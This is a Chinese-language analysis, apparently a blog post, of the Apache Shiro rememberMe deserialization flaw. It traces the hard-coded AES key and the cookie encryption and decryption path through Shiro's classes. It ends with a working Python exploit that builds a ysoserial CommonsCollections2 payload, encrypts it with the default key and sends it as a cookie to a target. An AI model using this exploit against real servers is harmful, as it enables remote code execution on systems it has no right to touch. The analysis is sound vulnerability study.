加密过程

org.apache.shiro.mgt.AbstractRememberMeManager

首先找到硬编码key的位置

1	`private static final byte[] DEFAULT_CIPHER_KEY_BYTES = Base64.decode("kPH+bIxk5D2deZiIxcaaaA==");`

登陆，记得勾选Remember Me

org.apache.shiro.mgt.AbstractRememberMeManager#onSuccessfulLogin

remeberMe为true，接下来进入remeberIdentity

org.apache.shiro.mgt.AbstractRememberMeManager#rememberIdentity

进入rememberIdentity

org.apache.shiro.mgt.AbstractRememberMeManager#rememberIdentity

第一个函数convertPrincipalsToBytes中先序列化用户名，然后用硬编码的key进行了aes加密

org.apache.shiro.mgt.AbstractRememberMeManager#convertPrincipalsToBytes

先进行序列化操作，再调用encrypt进行加密

org.apache.shiro.mgt.AbstractRememberMeManager#encrypt

这里可知加密方法为AES/CBC/PKCS5Padding，通过getEncryptionCipherkey获取密钥

ciphrtService

key的来源

org.apache.shiro.mgt.AbstractRememberMeManager#getEncryptionCipherKey

很明显这个函数就是用来获取key的，可以看到key的来源是encryptionCipherKey

在构造函数中，把硬编码keyDEFAULT_CIPHER_KEY_BYTES作为参数传入setCipherKey，再经过setEncryptionCipherKey函数赋值给encryptionCipherKey，这样key就是已知的了。

1
2
3

public AbstractRememberMeManager() {
       this.setCipherKey(DEFAULT_CIPHER_KEY_BYTES);
   }

public void setCipherKey(byte[] cipherKey) {
        this.setEncryptionCipherKey(cipherKey);
        this.setDecryptionCipherKey(cipherKey);
    }

1
2
3

public void setEncryptionCipherKey(byte[] encryptionCipherKey) {
        this.encryptionCipherKey = encryptionCipherKey;
    }

继续加密

进入加密函数，两个参数分别是序列化后的root，和硬编码key

org.apache.shiro.mgt.AbstractRememberMeManager#rememberIdentity

回到rememberIdentity方法，convertPrincipalsToBytes方法执行完后返回了AES加密后的二进制字节流，接下来进入rememberSerializedIdentity

org.apache.shiro.mgt.CookieRememberMeManager#rememberSerializedIdentity

这里的逻辑就很清楚了，把刚刚加密过的数据进行base64编码后再存入cookie

总结

主要逻辑就是用序列化->AES->base64的方式处理cookie

1.org.apache.shiro.mgt.AbstractRememberMeManager#onSuccessfulLogin
判断是否选择了rememberMe选项

2.org.apache.shiro.mgt.AbstractRememberMeManager#rememberIdentity
调用convertPrincipalsToBytes和rememberSerializedIdentity

3.org.apache.shiro.mgt.AbstractRememberMeManager#convertPrincipalsToBytes
序列化用户名并用硬编码key进行AES加密

4.org.apache.shiro.mgt.CookieRememberMeManager#rememberSerializedIdentity
把加密过的数据base64编码后写入cookie

解密过程

根据加密过程可以知道，解密过程一定经过了base64解码、AES解密、反序列化这几个步骤，接下来详细分析这几个步骤的执行过程，并找到反序列化点

1	`readValue->getRememberedSerializedIdentity base64docode->convertBytesToP`

org.apache.shiro.mgt.AbstractRememberMeManager#decrypt

在decrypt方法这里下一个断点

调用栈

org.apache.shiro.mgt.DefaultSecurityManager#resolvePrincipals

作用是调用getRememberedIdentity

org.apache.shiro.mgt.DefaultSecurityManager#getRememberedIdentity

作用是调用getRememberedPrincipals

org.apache.shiro.mgt.AbstractRememberMeManager#getRememberedPrincipals

分别调用了getRememberedSerializedIdentity和convertBytesToPrincipals，前者对cookie进行base64解码，后者进行AES解密和反序列化。

base64解码

org.apache.shiro.web.mgt.CookieRememberMeManager#getRememberedSerializedIdentity

这里出现了读取cookie的操作

1	`String base64 = this.getCookie().readValue(request, response);`

org.apache.shiro.web.servlet.SimpleCookie.readValue

getName()返回rememberMe，最终返回cookie中remeberMe的值

org.apache.shiro.mgt.AbstractRememberMeManager#convertBytesToPrincipals

调用decrypt和deserialize，进行AES解密和反序列化操作

AES解密

org.apache.shiro.mgt.AbstractRememberMeManager#decrypt

进行解密，getCipherService()获取加密方法AES/CBC/PKCS5Padding

org.apache.shiro.cryoti.JcaCipherService#decrypt

继续进入decrypt

org.apache.shiro.cryoti.JcaCipherService#decrypt

接下来进入crypt

org.apache.shiro.cryoti.JcaCipherService#crypt

到这里已经基本完成解密，接下来就是反序列化操作了

反序列化

org.apache.shiro.mgt.AbstractRememberMeManager#convertBytesToPrincipals

回到上面的convertBytesToPrincipals，继续进入deserialize进行反序列化

org.apache.shiro.mgt.AbstractRememberMeManager#deserialize

调用deserialize

org.apache.shiro.io.DefaultSerializer#deserialize

出现readObject，将输入参数进行反序列化

总结

cookie base64解码 AES解密反序列化

主要执行流程

1.org.apache.shiro.mgt.AbstractRememberMeManager#getRememberedPrincipals
调用getRememberedSerializedIdentity方法和convertBytesToPrincipals
2.org.apache.shiro.web.mgt.CookieRememberMeManager#getRememberedSerializedIdentity
base64解码
3.org.apache.shiro.mgt.AbstractRememberMeManager#decrypt
进行AES解密
4.org.apache.shiro.io.DefaultSerializer#deserialize
进行反序列化

漏洞利用

参考链接里的exp，Demo选择的Gadget是CommonsCollections2

import base64
import uuid
import subprocess

import requests
from Crypto.Cipher import AES


def encode_rememberme(command):
    # 这里使用CommonsCollections2模块
    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'CommonsCollections2', command], stdout=subprocess.PIPE)
    # 明文需要按一定长度对齐，叫做块大小BlockSize 这个块大小是 block_size = 16 字节
    BS = AES.block_size
    # 按照加密规则按一定长度对齐,如果不够要要做填充对齐
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    # 泄露的key
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    # AES的CBC加密模式
    mode = AES.MODE_CBC
    # 使用uuid4基于随机数模块生成16字节的 iv向量
    iv = uuid.uuid4().bytes
    # 实例化一个加密方式为上述的对象
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    # 用pad函数去处理yso的命令输出，生成的序列化数据
    file_body = pad(popen.stdout.read())
    # iv 与 （序列化的AES加密后的数据）拼接， 最终输出生成rememberMe参数
    base64_rememberMe_value = base64.b64encode(iv + encryptor.encrypt(file_body))

    return base64_rememberMe_value



if __name__ == '__main__':
    # cc2的exp
    payload = encode_rememberme('calc')
    print("rememberMe={}".format(payload.decode()))

    cookie = {
        "rememberMe": payload.decode()
    }

    requests.get(url="http://192.168.199.152:8080/web_war/", cookies=cookie)